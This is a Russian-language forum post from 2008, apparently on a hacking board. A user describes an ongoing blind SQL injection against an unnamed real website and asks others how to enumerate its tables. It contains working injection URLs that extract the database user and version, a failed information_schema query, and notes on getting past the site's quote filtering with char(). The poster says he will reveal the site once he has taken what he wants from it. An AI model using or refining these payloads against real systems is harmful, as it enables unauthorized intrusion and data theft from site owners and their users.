Показать сообщение отдельно

  #4  
Старый 22.07.2008, 16:39
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию

у меня такая проблема:
[http://site.ru]/index.php?act=25+AND+ascii(lower(substring(user(), 1,1)))=97--
запрос проходит удачно, вытянул юзера, весию: 5.1.2.2

далее была идея подобрать таблицы и колонки так же способом:
index.php?act=25+and+ascii(lower(substring(table_n ame,1,1)))>10+from+information_schema.tables+limit +0,1--

результата ноль. может ли кто подсказать метод раскрутки подобных скулей, хотябы теоретически.
сайт пока не палю, когда получу от него то, что надо - выложу в соответствующей теме -)
edited: непосредственно "кавычки" фильтруются, через char(39 / 34) не фильтрует, BENCHMARK не ощущается что проходит (скорее всего парсится).

Последний раз редактировалось Calcutta; 22.07.2008 в 17:48..
 
Ответить с цитированием